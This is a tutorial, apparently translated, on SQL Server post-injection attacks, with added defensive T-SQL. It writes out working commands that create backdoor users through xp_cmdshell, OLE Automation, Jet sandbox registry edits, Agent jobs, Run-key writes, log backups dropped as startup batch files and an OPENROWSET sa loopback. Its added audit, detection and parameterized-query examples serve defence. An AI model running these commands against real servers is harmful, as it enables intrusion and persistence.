SQL Server is the database behind a great many small and medium-sized websites. The same rich feature set that makes it convenient has also given it a long list of security problems. SQL injection has been popular in China for years, and a steady stream of SQL Server intrusion techniques has grown out of it. Because SQL Server executes stacked statements (several statements in one batch), few attackers bother guessing table names once they have found an injection point; they go straight to the server's stored procedures and functions to gain privileges quickly. This article walks through those system stored procedures and functions and the attacks built on them.
1. Execute system commands
Stored procedures make it quick and easy to get a shell, in the simplest case by running operating-system commands. The extended stored procedure call is:
exec master..xp_cmdshell 'net user ray ray /add'
xp_cmdshell is the extended stored procedure that SQL Server ships for running operating-system commands; the command runs under the SQL Server service account. By default only members of the sysadmin server role may execute it, and from SQL Server 2005 onward the procedure is also switched off until a sysadmin enables the xp_cmdshell option through sp_configure.
SQL Server also exposes OLE Automation through the sp_OACreate and sp_OAMethod procedures, which instantiate COM objects and call their methods, giving an indirect shell. sp_OACreate creates a WScript.Shell object and returns its handle in the variable @shell; sp_OAMethod then calls the object's Run method to execute the command. These procedures are likewise sysadmin-only, and on SQL Server 2005 and later they are disabled until the 'Ole Automation Procedures' option is turned on.
DECLARE @shell INT
EXEC SP_OAcreate 'wscript.shell',@shell out
EXEC SP_OAMETHOD @shell,'run',null, 'net user ray ray /add'
Disabling the Jet sandbox. By default the Jet database engine refuses expressions such as select shell("net user ray ray /add") because they are evaluated inside its sandbox; once the sandbox is switched off the same expression executes the command. First rewrite the registry with the xp_regwrite stored procedure (a SandBoxMode of 0 means the sandbox is off at all times), then use OPENROWSET to open an Access database file that ships with Windows, and run the command through the SQL statement passed to it. On SQL Server 2005 and later OPENROWSET against an arbitrary provider additionally requires the 'Ad Hoc Distributed Queries' option.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user ray ray /add")');
SQL Server Agent can also run commands. The Agent service is usually not running, so first start SQLSERVERAGENT with xp_servicecontrol, then delete any leftover job of the same name, create a job with a CmdExec step, attach it to the local server, and start it immediately. Each of these msdb procedures needs sysadmin or the corresponding SQLAgent role, and the command runs under the Agent service account.
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
use msdb
exec sp_delete_job null,'x'
exec sp_add_job 'x'
exec sp_add_jobstep null,'x',null,'1','CMDEXEC','cmd /c Dir C:'
exec sp_add_jobserver null,'x',@@servername
exec sp_start_job 'x'
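Every one of the four paths above depends on a server option, a registry value, or a role membership that a defender can read back from T-SQL. The script below is an added example, not code from the original article: it audits the relevant options in sys.configurations, lists sysadmin members and explicit EXECUTE grants on the extended procedures, reads the Jet SandBoxMode value back with xp_regread, and then closes the options with sp_configure. All object and option names are real SQL Server 2005+ system objects; nothing else is assumed. Run it as sysadmin.

```sql
-- Added example (not from the original article): audit and close the
-- command-execution paths of section 1. Requires sysadmin.

-- 1. Which of the dangerous server options are switched on? (value_in_use = 1)
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',   -- sp_OACreate / sp_OAMethod
               'Ad Hoc Distributed Queries',  -- OPENROWSET / OPENDATASOURCE
               'Agent XPs',                   -- SQL Server Agent job procedures
               'show advanced options');

-- 2. Who can use them regardless of any grant? sysadmin bypasses everything below.
SELECT r.name AS role_name, m.name AS member_name, m.type_desc
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 3. Explicit EXECUTE grants on the extended procedures that live in master.
SELECT o.name AS proc_name, pr.name AS grantee, dp.state_desc, dp.permission_name
FROM master.sys.database_permissions dp
JOIN master.sys.objects o ON o.object_id = dp.major_id AND dp.class = 1
JOIN master.sys.database_principals pr ON pr.principal_id = dp.grantee_principal_id
WHERE o.name IN ('xp_cmdshell', 'xp_regwrite', 'xp_regread', 'xp_servicecontrol',
                 'xp_dirtree', 'xp_subdirs', 'xp_fileexist', 'xp_availablemedia',
                 'sp_OACreate', 'sp_OAMethod');

-- 4. Has the Jet sandbox been opened through xp_regwrite?
--    0 = sandbox off at all times (what the attack writes); raises an error if the
--    key is absent, e.g. on a 64-bit instance without the 32-bit Jet provider.
DECLARE @sandbox int;
EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
     'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', @sandbox OUTPUT;
SELECT @sandbox AS jet_sandbox_mode;

-- 5. Close the options. sp_configure needs sysadmin (ALTER SETTINGS).
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
EXEC sp_configure 'Agent XPs', 0;
RECONFIGURE;
```

Query 2 is the one that matters most: if the login the web application connects with appears in it, every technique on this page works against that site and none of the option switches help, because a sysadmin can simply turn them back on.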
2. Write arbitrary files to execute commands
Use xp_regwrite to write the command straight into the Run key under HKEY_LOCAL_MACHINE; Windows executes it at the next interactive logon of any user.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','shell','REG_SZ','C:\windows\system32\cmd.exe /c net user ray ray /add'
Backing up the transaction log into a startup item
Switch a database to the full recovery model, create a table in it, take a first log backup so the log is flushed, insert the command text into the table, and then back up the log a second time, this time to a batch file in the All Users Startup folder. The backup file is mostly binary, but the inserted command text is embedded in it as-is; cmd.exe skips the lines it cannot parse and runs the one it can, so the file executes at the next logon. BACKUP LOG requires sysadmin, db_owner or db_backupoperator in that database, and the same database must be used throughout (the table is created in whichever database is current).
alter database msdb set RECOVERY FULL--
create table cmd (a image)--
backup log msdb to disk = 'c:\cmd1' with init--
insert into cmd (a) values ('<command to run>')--
backup log msdb to disk = 'C:\Documents and Settings\All Users\Start Menu\Programs\Startup\1.bat'--
drop table cmd--
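Because BACKUP always records itself in msdb, the trick above leaves evidence that is easy to query. The following is an added example, not part of the original article: it reads msdb's backup history for log backups written to paths that are not backup files, lists databases in the full recovery model, and shows any user tables left behind in msdb. The path patterns (Startup folder, inetpub, .bat/.asp/.exe) are this example's own assumptions about where an attacker would aim the file; everything else is real msdb and catalog metadata.

```sql
-- Added example (not from the original article): hunt for log backups aimed at
-- startup folders or web roots. Needs read access to msdb (sysadmin is simplest).

-- 1. Backups whose target is not a backup file. Every BACKUP statement, including
--    one fired through injection, writes a row here unless msdb was cleaned afterwards.
SELECT bs.database_name,
       bs.type,                       -- 'L' = log backup, 'D' = full backup
       bs.backup_start_date,
       bs.user_name,                  -- login that ran BACKUP
       bmf.physical_device_name       -- the file the attacker chose
FROM msdb.dbo.backupset bs
JOIN msdb.dbo.backupmediafamily bmf ON bmf.media_set_id = bs.media_set_id
WHERE bmf.physical_device_name NOT LIKE '%.trn'
  AND bmf.physical_device_name NOT LIKE '%.bak'
  AND (   bmf.physical_device_name LIKE '%\Startup\%'   -- assumed target patterns
       OR bmf.physical_device_name LIKE '%\inetpub\%'
       OR bmf.physical_device_name LIKE '%.bat'
       OR bmf.physical_device_name LIKE '%.asp%'
       OR bmf.physical_device_name LIKE '%.exe')
ORDER BY bs.backup_start_date DESC;

-- 2. The trick needs FULL recovery. msdb is SIMPLE by default, so msdb in FULL is
--    suspicious; a user database in FULL is normal and is only context.
SELECT name, recovery_model_desc
FROM sys.databases
WHERE recovery_model_desc = 'FULL';

-- 3. User tables left behind in msdb (the sequence above creates 'cmd' there).
SELECT name, create_date
FROM msdb.sys.tables
WHERE is_ms_shipped = 0;
```

Pair query 1 with the list of logins holding db_backupoperator or db_owner in each database: the web application's login should hold neither, and then BACKUP LOG is not available to an injection at all.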
3. Executing commands from a login with no special permissions
From a login that holds no server role at all, OPENROWSET can still execute commands, provided you know the account and password of a sysadmin login such as sa. The function opens a second connection back to the server with those credentials, so the inner statement runs with the sysadmin's rights. The 'SQLoledb' provider name is the classic SQL Server OLE DB provider, and set fmtonly off is needed because OPENROWSET first runs the query in metadata-only mode, in which xp_cmdshell would not actually execute. On SQL Server 2005 and later the server must also have the 'Ad Hoc Distributed Queries' option enabled.
select * from OPENROWSET('SQLoledb','uid=sa;pwd=admin;Address=127.0.0.1,7788;','set fmtonly off exec master..xp_cmdshell ''dir c:''')
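The loopback above needs two things the defender controls: the ad hoc query option and a sysadmin password the attacker can guess. The script below is an added example, not code from the original article. It checks the option, then uses PWDCOMPARE() to test every SQL login, sa first, against a short list of candidate passwords without ever exposing the stored hashes, and finally disables sa. The candidate list is constructed for this example; the catalog views, PWDCOMPARE and IS_SRVROLEMEMBER are real SQL Server 2005+ features. Run as sysadmin.

```sql
-- Added example (not from the original article): is the OPENROWSET loopback
-- possible on this server, and is there a sysadmin password worth guessing?

-- 1. OPENROWSET against an arbitrary data source is only allowed when this is 1.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name = 'Ad Hoc Distributed Queries';

-- 2. SQL logins whose password matches a weak candidate. sa is principal_id 1 even
--    if it has been renamed. The candidate list is constructed for this example.
DECLARE @candidates TABLE (pwd nvarchar(128));
INSERT INTO @candidates (pwd)
VALUES (N''), (N'sa'), (N'admin'), (N'password'), (N'123456'), (N'sa123'), (N'Passw0rd');

SELECT l.name,
       l.is_disabled,
       CASE WHEN l.principal_id = 1 THEN 1 ELSE 0 END AS is_sa,
       IS_SRVROLEMEMBER('sysadmin', l.name)            AS is_sysadmin,
       c.pwd                                           AS matching_password
FROM sys.sql_logins l
JOIN @candidates c ON PWDCOMPARE(c.pwd, l.password_hash) = 1
ORDER BY is_sysadmin DESC, l.name;

-- 3. Remediation: disable sa (fails if it was renamed; use the name from step 2),
--    close the option, and keep the web application's login out of sysadmin.
ALTER LOGIN sa DISABLE;
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0; RECONFIGURE;
```

A row in step 2 with is_sysadmin = 1 is exactly the credential the OPENROWSET call above needs; with the option off and sa disabled, the attacker is left with whatever rights the application's own login has.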
4. Gathering other system information
These extended procedures read the file system under the SQL Server service account and, unlike the ones above, often remain executable by ordinary logins.
Walk a directory tree (xp_dirtree also accepts a depth and a flag to include files)
exec master.dbo.xp_dirtree 'c:\'
List the immediate subdirectories
exec master.dbo.xp_subdirs 'c:\'
List the drives on the system, with free space
exec master.dbo.xp_availablemedia
Check whether a directory or file exists
exec master..xp_fileexist 'c:\boot.ini'
5. Ways to defend against SQL injection
1. Modify the table structure. Change the administrator account column to a long text type, 255 characters at least (enough in practice; use a memo/text type if you want more), and do the same for the password column.
2. Modify the table contents. Put an account with administrator rights in the row with ID 1 and fill its account and password with a long run of Chinese characters, preferably more than 100.
3. Put the real administrator account in any row after ID 2.
These three steps complete the change to the database.
Is that the end of it? Not quite. Remember that the ID 1 account you created is a genuine account with real permissions, and with today's processing speed a tool that reads and replays it would still get in, so on its own this is not safe. Most readers will already see the fix: enforce a character limit in the administrator login page. An attacker submitting the thousand-character decoy credentials is rejected by the length check, while the real password, kept to a normal length, is unaffected. Note that this only hinders attackers reading the application's own tables; it does nothing against the stored-procedure techniques in sections 1 to 4, which never touch those tables. Those are stopped by parameterized queries, by connecting the application with a login that is not a member of sysadmin, and by disabling the procedures and options described above.
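The length limit above keeps the decoy credentials out, but a stacked query such as '; exec master..xp_cmdshell 'net user ray ray /add' -- is short and passes any reasonable limit. What stops it is keeping user input out of the statement text. The following is an added example, not code from the original article; the dbo.admin table, its columns and the two procedure names are assumed for illustration. It places the concatenating login procedure beside the parameterized one and runs the same constructed payload through both.

```sql
-- Added example (not from the original article): vulnerable vs. parameterized login.
-- Table and procedure names are assumed; HASHBYTES('SHA2_256') needs SQL Server 2012+.
CREATE TABLE dbo.admin (
    id       int IDENTITY PRIMARY KEY,
    username nvarchar(255) NOT NULL,
    pwdhash  varbinary(32) NOT NULL
);
GO

-- Vulnerable form: the input is spliced into the statement text, so a username of
--   x'; exec master..xp_cmdshell 'dir c:\' --
-- becomes a second statement in the batch. Length limits do not change that.
CREATE PROCEDURE dbo.login_bad @user nvarchar(255), @pwd nvarchar(255) AS
BEGIN
    DECLARE @sql nvarchar(max) =
        N'SELECT id FROM dbo.admin WHERE username = ''' + @user +
        N''' AND pwdhash = HASHBYTES(''SHA2_256'', ''' + @pwd + N''')';
    EXEC (@sql);
END;
GO

-- Hardened form: the statement text is a constant; the input travels as
-- parameters and is never parsed as T-SQL, whatever characters it contains.
CREATE PROCEDURE dbo.login_ok @user nvarchar(255), @pwd nvarchar(255) AS
BEGIN
    EXEC sp_executesql
        N'SELECT id FROM dbo.admin WHERE username = @u AND pwdhash = HASHBYTES(''SHA2_256'', @p)',
        N'@u nvarchar(255), @p nvarchar(255)',
        @u = @user, @p = @pwd;
END;
GO

-- Constructed payload: a harmless stacked query in the username field. Replace the
-- inner SELECT with the xp_cmdshell call from section 1 to see the real impact.
DECLARE @payload nvarchar(255) = N'x''; SELECT ''injected'' AS marker; --';
EXEC dbo.login_bad @payload, N'irrelevant';  -- returns a second result set: 'injected'
EXEC dbo.login_ok  @payload, N'irrelevant';  -- returns no rows: the payload is only a string
```

The parameterized form also makes the decoy row in section 5 unnecessary for this purpose: with no way to alter the statement, an attacker cannot read the administrator table through this login at all, regardless of how long its contents are.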